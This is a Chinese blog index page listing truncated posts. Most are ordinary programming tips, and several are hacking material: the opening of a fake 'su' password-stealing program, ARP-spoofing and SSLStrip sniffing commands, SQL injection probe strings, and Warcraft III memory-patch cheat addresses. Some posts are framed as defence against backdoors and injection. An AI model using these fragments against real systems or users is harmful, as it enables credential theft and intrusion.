- 博客(27)
- 资源 (20)
- 收藏
- 关注
转载 Javascript 检测键盘按键
Javascript中 有3个事件句柄在对应键盘的输入状态:keydown、keypress和keyup。分别对应的意思是:按键被按下(按下按键但还没有抬起)、点击按键(按下并抬起按键)、按键抬起(按键抬起之后)按键的分类:按键可以分为“实键”和“虚键”实键可以理解为我们能够看到并打印出来的按键,如字母“A”、数字“1”、字符“?”等等虚键就是那些无法打印出
2014-02-14 16:47:36 5950
转载 Linux vi 按键键盘映射表
光标控制命令 命令 光标移动 h或^h 向左移一个字符 j或^j或^n 向下移一行 k或^p 向上移一行 l或空格 向右移一个字符 G 移到文件的最后一行 nG 移到文件的第n行 w 移到下一个字的开头 W 移到下一个字的开头,忽略标点符号 b 移到前一个字的开头 B 移到前一个字的开头,忽略标点符号 L 移到屏幕的最后一行 M 移到屏幕的中间一
2012-05-29 21:12:55 4909
转载 Unix/Linux上的后门技术和防范
对黑客来讲,入侵一个系统只是万里长征的开始,最主要的是长期占有一个肉鸡(傀儡机),所以,后门技术往往非常重要。对于我们来讲,总是处于被动的地位,百密一疏,总有没有做到位的地方,谁都不能保证自己的系统是绝对安全的,所以不能避免我们可能会被入侵。黑客入侵后肯定会留后门,当然,除了那些高手,境界非常高,入侵只是为了测试或者技术挑战,对于一般黑客来讲,入侵之后留个后门是很重要的,我们要防范,当然就要了解常
2012-05-16 22:12:04 1284
转载 kpr-fakesu.c Linux su密码欺骗 源码
/* * kpr-fakesu.c V0.9beta167 ;P * by koper * * Setting up: * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c * admin@host:~$ mv .su /var/tmp/.su * admin@host:~$ cp .bash_profile .wgetrc
2012-05-16 16:22:32 2735
原创 如果ssh端口转发时候-g没有效果解决方案
-g Allow remote hosts to connect to forwarded ports.在-L/-R/-D参数中,允许远程主机连接到建立的转发的端口,如果不加这个参数,只允许本地主机建立连接。其实这是ssh默认的安全策略所致修改配置文件 HiRoot@bt:~#vi /etc/ssh/sshd_config在文件最后加入 gatewayports yes
2012-05-16 13:04:32 4462
转载 Linux提权的一些基本思路
Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared(my starting point).
2012-05-15 16:15:41 4351
转载 AirCrack中文手册 1.0
//--------------------------------------------------------------------// AirCrack中文手册 1.0// 翻译:GaA.Ra(zhoufan#yahoo.cn)// 随意转载,但请保留此部分信息,谢谢/
2012-03-11 18:32:14 2685
转载 Backtrack下密码字典生成器使用参数(crunch3.0)
Creating wordlists with crunch v3.0CRUNCH v3.0 Warning... this is a looong post, grab a beverage.. ;) Also heavy on images..PRE-INTRO Since the post on Creating wordlists with crunch v
2012-02-24 14:51:32 7465
原创 利用SSLStrip & Ettercap ARP欺骗嗅探密码
apt-get purge ettercapapt-get purge sslstripapt-get install ettercapapt-get install sslstripecho '1' > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p tcp --destination-port
2012-02-21 17:49:18 4524
原创 mstsc.exe的小插件,隐藏客户端计算机名
当mstsc.exe登陆远程桌面服务器的时候,mstsc.exe会将客户端的一些信息发给服务端,最讨厌的就是将本机的计算机名、网卡ip发送过去, 不管你跳了几次代理,在服务器上的任务管理器的“用户”选项卡中显示的客户端名就是我的计算机名,以及系统事件日志中也有,这个小插件就是解决这个问题 的,利用微软的Virtual Channel Client DLL插件接口来加载dll,然后hook API
2012-02-02 17:37:52 1557
转载 魔兽 1.24E 作弊内存地址全公开
///////////1.24E ////////////////////////////////////////////////////////////////////////大地图去除迷雾 patch(0x74D1B9,"/xB2/x00/x90/x90/x90/x90"); ////////////////////////////Reveal units m
2011-08-30 14:58:16 4779
转载 魔兽 1.24B 作弊内存地址全公开
//1.24B /////////////////////////////////////////////////////////////////////大地图去除迷雾 patch(0x74D103,"/xC6/x04/x3E/x01/x90/x46"); ///////////////////////////////////////////////////////大地图显示单
2011-08-30 14:57:27 1612
转载 魔兽1.20E作弊内存地址全公开
//////////////1.20E ///////////////////////////////////////////////////大地图去除迷雾 patch(0x406B53,"/x90/x8B/x09"); ///////////////////////////////////////////////////大地图显示单位 patch(0x2A0930,"/x
2011-08-30 14:56:15 933
转载 SQL获取所有用户名,数据库名、所有表名、所有字段名及字段类型
1.获取所有用户名:SELECT name FROM Sysusers where status='2' and islogin='1'islogin='1'表示帐户islogin='0'表示角色status='2'表示用户帐户status='0'表示糸统帐户2.获取所有数据库名:SELECT Name FROM Master..SysDatabases ORDER BY Name3.获取所有表名SELECT Name FROM DatabaseName..SysObjects Where XType='U
2011-05-01 23:55:00 914
原创 getElementsByName 的应用,获取组的选择值
<br />例子:<br /><html><head> <title>getElementsByName Sample</title> <mce:script type="text/javascript" language="javascript"><!-- function getColor() { var oColors = document.getElementsByName("rdColor"); var color = ""; f
2011-04-28 11:00:00 1474
原创 javascript 获取值
<br />1.文本框<br />1.1 <input type="text" name="test" id="test"><br />通过var t=document.getElementById("test").value把值赋给变量t,<br />1.2 当然也可以反过来把已知的变量值赋给文本框,例如:<br />var m = "5";<br />document.getElementById("test").value= m;<br />2.下拉列表框<br />2.1 <select name=
2011-04-28 10:56:00 4198
原创 解决魔兽争霸(冰封王座)1.20 浩方建主机卡机问题。
虽然这个问题没有完美的解决办法,但是本人实践出不是办法的办法。希望能给广大魔兽玩家带来帮助。解决思路:既然不能解决浩方与魔兽的卡机问题,那么我们可以在CPU使用率上来想办法,使魔兽(war3.exe)的CPU使用率限制住,使用进程优先级。相关工具:Process Explorer官方下载:http://technet.microsoft.com/en-us/sysinternals/
2008-09-30 21:02:00 4739
原创 WINDOWS特殊目录探索(FAT32下)
大家都了解windows下是无法创建带“.”的目录的。可是在命令行下用命令“md a../”,便可以在windows下轻松创建出“a.”文件夹.............具体内容见附件 >>>>右击该图片 目标另存为1.rar
2008-02-18 13:17:00 1170
原创 关于ansi控制码
箭头+“[”声明了转义序列的开始 后面的 “1 ”定义了默认的字体宽度。对于文本属性来说,这些值是有意义的:0、1、22、4、24、5、25、7、27, 分别表示:默认值、粗体、非粗体、下划线、非下划线、闪烁、非闪烁、 反显、非反显。 30m -- 37m 设置前景色 40m -- 47m 设置背景色 可选颜色:红色、绿色、黄色、蓝色、洋红、青色和白色。 他们对应的颜色代码
2008-02-08 20:02:00 1306
原创 获取system和LoadLibraryA函数的地址
GetLoadSysAdd.cpp#include #include typedef void (*MYPROC)(LPTSTR);int main(){ HINSTANCE LibHandle; MYPROC ProcAdd; LibHandle = LoadLibrary("msvcrt"); printf("msvcrt LibHandle = //x%x/n", LibH
2008-01-20 09:33:00 3179 1
转载 autorun.inf完全操作手册
总结的比较全,有用的几乎都写上了,对比以前收集的《病毒的Autorun.inf新写法与应用以及防御》和《彻底杜绝Autorun.inf自动运行》对自己写写Autorun.inf,或修改,杀毒等颇有帮助笔者按:鉴于现在网上完全介绍Autorun.inf功能的文章不多,笔者在微软官网的一个犄角旮旯找到了一篇Autorun.inf的英文使用说明,在翻译和笔者的亲自试验下写出此篇文章。======我是
2008-01-17 14:23:00 1220
转载 全手工SQL注入式脚本整理
1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符and [查询条件] and = 4.搜索时没过滤参数的and [查询条件] and %25= 5.判断数据库系统 ;and (select count(*) from sysob
2008-01-17 14:21:00 1428
原创 JavaScript加密解密7种方法
from:baiker本文一共介绍了七种javascript加密方法: 在做网页时(其实是网页木马呵呵),最让人烦恼的是自己辛辛苦苦写出来的客户端IE运行的javascript代码常常被别人轻易的拷贝,实在让自己的心里有点不是滋味,要知道自己写点东西也挺累的......^*^ 但我们也应该清楚地认识到因为javascript代码是在IE中解释执行,要想绝对的保密是不可能的,我们要做的就
2008-01-17 14:19:00 1611 1
转载 Total Uninstall——帮你监视软件安装的所有过程
From:小黑软件Total Uninstall (软件安装卸载监视)能帮你监视软件安装的所有过程,记录下它对系统所做的任何改变,比如:添加的文件、对注册表和系统文件的修改,并制作成安装前和安装后的快照。卸载软件时,不需要使用卸载程序,直接通过该软件便可将其完全地清除出系统,不留下任何痕迹。从而保证了系统的清洁。主要特点:*监控安装中注册表及文件系统的改变*完全彻底卸载被监控程序*对相
2008-01-17 14:17:00 1940
转载 一行代码解决iframe挂马(服务器端注入、客户端ARP注入等)
一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)本文原创:linr@cncert.net 请转载时保留版权信息相信大多数朋友都是iframe木马的受害者,有朋友的网站被注入了N回iframe,心情可想而知。而且现在ARP攻击,注入iframe也是轻而易举的事,仅局域网里都时刻面临威胁,哎,什么世道。灵儿曾经在经典论坛上发过贴子:《一行代码解决网站防挂IFRAME木马方案
2008-01-17 14:15:00 1187
转载 奇特的挂马方式
我写这文章并不是教大家怎么跑去挂马啊,挂马是不对的!不过有的时候真的很想做些让人觉得痛快的事情,因为我就碰到很多的管理员,你跟他说服务器有问题吧!他不信,你改些东西警告他吧,他比你还勤快,你一改他马上覆盖回去,让人真的很郁闷。还有在国外的一些机器上,什么权限都拿到了也不知道他怎么弄的,什么都不让写,好不容易写个文件没一会又改回去了,真的让人很!#$%%#%^#%^,据说就有一种软件能监视重要的文件
2008-01-17 13:56:00 1112
PHPDesigner8 Portable(官方原版免安装)+注册码
2012-07-19
Process Explorer v11.20汉化版
2008-09-30
Imail2006 联系人问号乱码补丁
2008-02-20
Imail 2006 乱码 补丁 FOR Administrator Service Page
2008-02-20
O&O UnErase (数据恢复) 绿色汉化版
2008-01-17
miniKillEBook
2008-01-17
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人